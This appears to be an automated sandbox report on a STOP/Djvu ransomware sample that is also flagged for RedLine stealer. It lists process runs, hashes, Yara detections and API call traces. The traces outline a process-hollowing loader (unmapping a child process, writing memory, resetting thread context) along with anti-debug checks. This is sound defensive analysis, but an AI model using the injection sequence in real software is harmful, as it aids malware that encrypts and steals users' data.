              Path:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe --Task
              Imagebase:0x400000
              File size:776'704 bytes
              MD5 hash:8F81E96F8C96DEC003B51826BBD5885F
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.3281459864.0000000000738000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:false

              Target ID:8
              Start time:15:59:08
              Start date:13/08/2024
              Path:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
              Imagebase:0x400000
              File size:776'704 bytes
              MD5 hash:8F81E96F8C96DEC003B51826BBD5885F
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2184694320.0000000000B0D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:9
              Start time:15:59:10
              Start date:13/08/2024
              Path:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
              Imagebase:0x400000
              File size:776'704 bytes
              MD5 hash:8F81E96F8C96DEC003B51826BBD5885F
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:11
              Start time:15:59:16
              Start date:13/08/2024
              Path:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
              Imagebase:0x400000
              File size:776'704 bytes
              MD5 hash:8F81E96F8C96DEC003B51826BBD5885F
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.2265091941.0000000000945000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:12
              Start time:15:59:18
              Start date:13/08/2024
              Path:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
              Imagebase:0x400000
              File size:776'704 bytes
              MD5 hash:8F81E96F8C96DEC003B51826BBD5885F
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:1.3%
                Dynamic/Decrypted Code Coverage:82%
                Signature Coverage:44%
                Total number of Nodes:50
                Total number of Limit Nodes:10
                execution_graph 33131 40a1a0 HeapCreate 33132 40a1ca 33131->33132 33133 401890 33136 407160 33133->33136 33135 40189a 33137 4071a1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 33136->33137 33138 407182 33136->33138 33140 407203 33137->33140 33138->33137 33139 40718e 33138->33139 33139->33135 33140->33139 33141 a53026 33142 a53035 33141->33142 33145 a537c6 33142->33145 33148 a537e1 33145->33148 33146 a537ea CreateToolhelp32Snapshot 33147 a53806 Module32First 33146->33147 33146->33148 33149 a53815 33147->33149 33150 a5303e 33147->33150 33148->33146 33148->33147 33152 a53485 33149->33152 33153 a534b0 33152->33153 33154 a534c1 VirtualAlloc 33153->33154 33155 a534f9 33153->33155 33154->33155 33156 c30000 33159 c30630 33156->33159 33158 c30005 33164 c30010 33159->33164 33161 c3064c LoadLibraryA 33162 c30702 33161->33162 33166 c31577 33162->33166 33165 c30028 33164->33165 33165->33161 33169 c305b0 33166->33169 33172 c305dc 33169->33172 33170 c305e2 GetFileAttributesA 33170->33172 33171 c3061e 33172->33170 33172->33171 33174 c30420 33172->33174 33175 c304f3 33174->33175 33176 c304fa 33175->33176 33177 c304ff CreateWindowExA 33175->33177 33176->33172 33177->33176 33178 c30540 PostMessageA 33177->33178 33179 c3055f 33178->33179 33179->33176 33181 c30110 VirtualAlloc GetModuleFileNameA 33179->33181 33182 c30414 33181->33182 33183 c3017d CreateProcessA 33181->33183 33182->33179 33183->33182 33185 c3025f VirtualFree VirtualAlloc Wow64GetThreadContext 33183->33185 33185->33182 33186 c302a9 ReadProcessMemory 33185->33186 33187 c302e5 VirtualAllocEx NtWriteVirtualMemory 33186->33187 33188 c302d5 NtUnmapViewOfSection 33186->33188 33189 c3033b 33187->33189 33188->33187 33190 c30350 NtWriteVirtualMemory 33189->33190 33191 c3039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33189->33191 33190->33189 33192 c303fb ExitProcess 33191->33192

                Control-flow Graph

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00C30156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 00C3016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 00C30255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C30270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00C30283
                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 00C3029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00C302C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 00C302E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00C30304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 00C3032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00C30399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00C303BF
                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 00C303E1
                • ResumeThread.KERNELBASE(00000000), ref: 00C303ED
                • ExitProcess.KERNEL32(00000000), ref: 00C30412
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 93872480-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: a602c2f69f634224aa6bf9b32dc2a8a1f82c103ab52101a267b5c3c979d174d5
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: EFB1C875A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 76 a537c6-a537df 77 a537e1-a537e3 76->77 78 a537e5 77->78 79 a537ea-a537f6 CreateToolhelp32Snapshot 77->79 78->79 80 a53806-a53813 Module32First 79->80 81 a537f8-a537fe 79->81 82 a53815-a53816 call a53485 80->82 83 a5381c-a53824 80->83 81->80 86 a53800-a53804 81->86 87 a5381b 82->87 86->77 86->80 87->83
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A537EE
                • Module32First.KERNEL32(00000000,00000224), ref: 00A5380E
                Memory Dump Source
                • Source File: 00000000.00000002.2046446224.0000000000A53000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A53000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a53000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: 6ea93711be7799463ea9ae7e5e9a2f83a675f197b2df834d0151ee53e767fe52
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: 4CF062326007106BDB203BB5A88DB6A76E8FF89766F100528FA42910C0DA70E9494661

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 c30630-c31572 call c30010 LoadLibraryA call c31577
                APIs
                • LoadLibraryA.KERNELBASE(user32), ref: 00C306E2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID: CloseHandle$CreateFileA$CreateProcessA$CreateWindowExA$DefWindowProcA$ExitProcess$GetCommandLineA$GetFileAttributesA$GetMessageA$GetMessageExtraInfo$GetModuleFileNameA$GetStartupInfoA$GetThreadContext$MessageBoxA$NtUnmapViewOfSection$NtWriteVirtualMemory$PostMessageA$ReadProcessMemory$RegisterClassExA$ResumeThread$SetThreadContext$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtectEx$WaitForSingleObject$WinExec$WriteFile$WriteProcessMemory$kernel32$ntdll.dll$user32
                • API String ID: 1029625771-3105132389
                • Opcode ID: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                • Instruction ID: 77dfe4b73178d5dda23af7726eabb171cc9755d3e3cb0c66ac59c94fbf044eaa
                • Opcode Fuzzy Hash: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                • Instruction Fuzzy Hash: 91A24460D0C6E8CDEB21C668CC4C7DDBEB51B26749F0841D9858C66292C7BB1B98CF76

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 50 c30420-c304f8 52 c304fa 50->52 53 c304ff-c3053c CreateWindowExA 50->53 54 c305aa-c305ad 52->54 55 c30540-c30558 PostMessageA 53->55 56 c3053e 53->56 57 c3055f-c30563 55->57 56->54 57->54 58 c30565-c30579 57->58 58->54 60 c3057b-c30582 58->60 61 c30584-c30588 60->61 62 c305a8 60->62 61->62 63 c3058a-c30591 61->63 62->57 63->62 64 c30593-c30597 call c30110 63->64 66 c3059c-c305a5 64->66 66->62
                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00C30533
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: 32c9b5e0545eef8039abc0c9232efd1b6cb5acdb1616f64baf66d2f9f8f877c4
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: 29511870D083C8DAEB11CBE8C859BDDBFB2AF11708F244058D5447F286C3BA5A58CB66

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 67 c305b0-c305d5 68 c305dc-c305e0 67->68 69 c305e2-c305f5 GetFileAttributesA 68->69 70 c3061e-c30621 68->70 71 c30613-c3061c 69->71 72 c305f7-c305fe 69->72 71->68 72->71 73 c30600-c3060b call c30420 72->73 75 c30610 73->75 75->71
                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 00C305EC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: dccabf7f818356f5024590e1723cca307a0a02869ebaa15792a7e9f11f15f440
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: 9D012171C0424CEEDF14DB98C5193AEBFB5AF41308F2480D9D8192B242D7769B58CBA5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 89 401890-401895 call 407160 91 40189a call 4018b0 89->91
                APIs
                • ___security_init_cookie.LIBCMTD ref: 00401895
                Memory Dump Source
                • Source File: 00000000.00000002.2045892350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2045818812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2045988748.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2046013884.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2046034523.0000000000424000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2046103167.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2046241413.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_C0XWmZAnYk.jbxd
                Similarity
                • API ID: ___security_init_cookie
                • String ID:
                • API String ID: 3657697845-0
                • Opcode ID: ca46f4187e82b5dceba764eb7d2f3dad5981a966620dc312e9fe7db825faa98b
                • Instruction ID: 35809d9606d4508c2bd79f66ccb572e5a38a06e06d22b732e3662e9e1c2bf126
                • Opcode Fuzzy Hash: ca46f4187e82b5dceba764eb7d2f3dad5981a966620dc312e9fe7db825faa98b
                • Instruction Fuzzy Hash: 42A0022280864C16925133B70487D0B755D48C4758795413A7518263D35C7CBD0140AF

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 93 a53485-a534bf call a53798 96 a534c1-a534f4 VirtualAlloc call a53512 93->96 97 a5350d 93->97 99 a534f9-a5350b 96->99 97->97 99->97
                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A534D6
                Memory Dump Source
                • Source File: 00000000.00000002.2046446224.0000000000A53000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A53000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a53000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: 18a405881070b70a321d174ab6346091cb297d7642d64ffeaf3553525f5a1eac
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: 70112B79A00208EFDB01DF98CA85E99BBF5AF08351F058094F9489B362D371EA90DB80

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 307 c4f030-c4f078 call c60160 call c54914 call c3d040 315 c4f080-c4f086 307->315 316 c4f090-c4f0c2 call c5bdc0 call c3cea0 315->316 321 c4f0c4-c4f0c9 316->321 322 c4f0ce-c4f112 316->322 323 c4f3bf-c4f3e0 call c54690 321->323 326 c4f114-c4f116 322->326 327 c4f118-c4f11d 322->327 331 c4f3e2-c4f3e6 323->331 332 c4f42d-c4f46c 323->332 329 c4f12f-c4f158 call c46480 call c525a2 326->329 330 c4f120-c4f129 327->330 348 c4f222-c4f285 call c46480 call c44990 call c432a0 call c46370 329->348 349 c4f15e-c4f197 call c45030 call c3e6e0 329->349 330->330 333 c4f12b-c4f12d 330->333 334 c4f3ec-c4f401 331->334 335 c4f7ca-c4f7da call c424b0 331->335 369 c4f46e 332->369 370 c4f48f-c4f4b2 332->370 333->329 334->316 344 c4f407-c4f428 334->344 346 c4f7dc-c4f7df 335->346 347 c4f7ed-c4f822 call c3f8f0 335->347 344->316 346->315 356 c4f826-c4f82c 347->356 406 c4f287-c4f290 call c52f27 348->406 407 c4f293-c4f2b7 348->407 371 c4f20f-c4f214 349->371 372 c4f199-c4f19e 349->372 359 c4f832-c4f834 356->359 360 c4f82e-c4f830 356->360 367 c4f837-c4f83c 359->367 366 c4f840-c4f84f call c44840 360->366 366->356 394 c4f851-c4f883 call c3f8f0 366->394 367->367 373 c4f83e 367->373 376 c4f470-c4f478 369->376 377 c4f4b4-c4f4b6 370->377 378 c4f4b8-c4f4bf 370->378 371->348 387 c4f216-c4f21f call c52f27 371->387 381 c4f1a0-c4f1a9 call c52f27 372->381 382 c4f1ac-c4f1c7 372->382 373->366 385 c4f47a-c4f487 376->385 386 c4f48b 376->386 379 c4f4cb-c4f4ef call c46070 call c432a0 377->379 380 c4f4c2-c4f4c7 378->380 414 c4f4f1 379->414 415 c4f4f3-c4f506 379->415 380->380 388 c4f4c9 380->388 381->382 391 c4f1e2-c4f1e8 382->391 392 c4f1c9-c4f1cd 382->392 385->376 409 c4f489 385->409 386->370 387->348 388->379 398 c4f1ee-c4f20c 391->398 392->398 399 c4f1cf-c4f1e0 call c50f40 392->399 413 c4f887-c4f88d 394->413 398->371 399->398 406->407 422 c4f2e3-c4f31a 407->422 423 c4f2b9-c4f2c0 407->423 409->370 417 c4f893-c4f895 413->417 418 c4f88f-c4f891 413->418 414->415 432 c4f514-c4f584 call c51602 call c5bdc0 call c54690 415->432 433 c4f508-c4f511 call c52f27 415->433 421 c4f898-c4f89d 417->421 420 c4f8a1-c4f8b0 call c44840 418->420 420->413 435 c4f8b2-c4f8ec call c44990 call c432a0 420->435 421->421 424 c4f89f 421->424 443 c4f38c-c4f3a8 422->443 444 c4f31c-c4f334 422->444 423->422 425 c4f2c2-c4f2ce 423->425 424->420 428 c4f2d7 425->428 429 c4f2d0-c4f2d5 425->429 434 c4f2dc 428->434 429->434 478 c4f586-c4f58a 432->478 479 c4f5dd-c4f637 432->479 433->432 434->422 452 c4f8f0-c4f908 435->452 453 c4f8ee 435->453 458 c4f3b6-c4f3b9 443->458 459 c4f3aa-c4f3b3 call c52f27 443->459 444->443 454 c4f336-c4f362 call c52a56 444->454 462 c4f916-c4f953 call c44990 call c432a0 452->462 463 c4f90a-c4f913 call c52f27 452->463 453->452 454->443 470 c4f364-c4f389 call c534a2 call c543d8 454->470 458->323 459->458 481 c4f955 462->481 482 c4f957-c4f966 462->482 463->462 470->443 478->335 483 c4f590-c4f5b1 478->483 510 c4f65f-c4f67d 479->510 511 c4f639 479->511 481->482 491 c4f974-c4f980 482->491 492 c4f968-c4f971 call c52f27 482->492 483->316 489 c4f5b7-c4f5d8 483->489 489->315 495 c4f982-c4f98b call c52f27 491->495 496 c4f98e-c4f9a8 491->496 492->491 495->496 497 c4f9b6 496->497 498 c4f9aa-c4f9b3 call c52f27 496->498 504 c4f9ba-c4f9d0 497->504 498->497 513 c4f683-c4f68d 510->513 514 c4f67f-c4f681 510->514 512 c4f640-c4f648 511->512 515 c4f64a-c4f657 512->515 516 c4f65b 512->516 518 c4f690-c4f695 513->518 517 c4f699-c4f6bb call c46070 call c432a0 514->517 515->512 523 c4f659 515->523 516->510 526 c4f6bd 517->526 527 c4f6bf-c4f6d5 517->527 518->518 519 c4f697 518->519 519->517 523->510 526->527 529 c4f6d7-c4f6e0 call c52f27 527->529 530 c4f6e3-c4f74b call c51602 call c5bdc0 527->530 529->530 541 c4f75c-c4f761 530->541 542 c4f74d-c4f756 530->542 543 c4f7b0-c4f7b2 541->543 544 c4f763-c4f784 541->544 542->541 550 c4f7e4-c4f7e8 542->550 545 c4f7b4-c4f7ba call c5158d 543->545 546 c4f7bd-c4f7bf 543->546 544->316 554 c4f78a-c4f7ab 544->554 545->546 546->335 549 c4f7c1-c4f7c7 call c5158d 546->549 549->335 550->504 554->315
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset$_free_malloc_strstr$_wcsstr
                • String ID: "
                • API String ID: 430003804-123907689
                • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                • Instruction ID: e069b3ef1b38d15bab451ef29d1afb0848f947d6863ca76f0e6c965eee36971f
                • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                • Instruction Fuzzy Hash: 2E420471508340ABDB20DF64DC49F9B7BE8BF85304F04092DF98997292DB74D64ACBA6
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00412B3D
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B54
                • UnhandledExceptionFilter.KERNEL32(0^K), ref: 00412B5F
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00412B7D
                • TerminateProcess.KERNEL32(00000000), ref: 00412B84
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2045892350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2045818812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2045988748.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2046013884.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2046034523.0000000000424000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2046103167.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2046241413.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_C0XWmZAnYk.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID: 0^K
                • API String ID: 2579439406-505205824
                • Opcode ID: f78378ce38f32599f24b24ef0b88521803168dbc64cbf2191dc48665781476f4
                • Instruction ID: 5ff6dfb2b731f72ef4d0600af7f2abfab178363874105feac72d2cef852c3781
                • Opcode Fuzzy Hash: f78378ce38f32599f24b24ef0b88521803168dbc64cbf2191dc48665781476f4
                • Instruction Fuzzy Hash: 7821F3B5911B04DFD711DF14FD84768FBA4BB08311F40427AE80996360E7B596918F4E
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                • Instruction ID: 219ada4d6acfd504bfeb665fdd1761ef3c0f8591981437e59e5a54a19b7a9e18
                • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                • Instruction Fuzzy Hash: 6B52AD71D00218DBDF10DFA8C885BDEBBF5BF14304F208169E919A7291E735AA49CFA5
                APIs
                • _wcsstr.LIBCMT ref: 00C3E72D
                • _wcsstr.LIBCMT ref: 00C3E756
                • _memset.LIBCMT ref: 00C3E784
                  • Part of subcall function 00C7FC0C: std::exception::exception.LIBCMT ref: 00C7FC1F
                  • Part of subcall function 00C7FC0C: __CxxThrowException@8.LIBCMT ref: 00C7FC34
                  • Part of subcall function 00C7FC0C: std::exception::exception.LIBCMT ref: 00C7FC4D
                  • Part of subcall function 00C7FC0C: __CxxThrowException@8.LIBCMT ref: 00C7FC62
                  • Part of subcall function 00C7FC0C: std::regex_error::regex_error.LIBCPMT ref: 00C7FC74
                  • Part of subcall function 00C7FC0C: __CxxThrowException@8.LIBCMT ref: 00C7FC82
                  • Part of subcall function 00C7FC0C: std::exception::exception.LIBCMT ref: 00C7FC9B
                  • Part of subcall function 00C7FC0C: __CxxThrowException@8.LIBCMT ref: 00C7FCB0
                • _wcsstr.LIBCMT ref: 00C3EA0C
                • _memset.LIBCMT ref: 00C3EE5C
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                • String ID:
                • API String ID: 1338678108-0
                • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                • Instruction ID: 33a7fcf583e8d4196ea899cbe1271ff612a661c546d71e167b11bf099142dc85
                • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                • Instruction Fuzzy Hash: 1D52E171A102199FCF24CF68CC84BAEBBF1FF49304F144569E856AB281D771AA46CF91
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c30000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                • Instruction ID: f218052770b6515cae3bc2f12afc2ccdfacebf84acfdd32ed5501f4d7abb6d50
                • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                • Instruction Fuzzy Hash: F042BE71D00208DBDF24DFA4CC85BDEB7F5BF04308F244169E855A7291EB31AA89CBA5
                Memory Dump Source
                • Source File: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                Joe Sandbox IDA Plugin
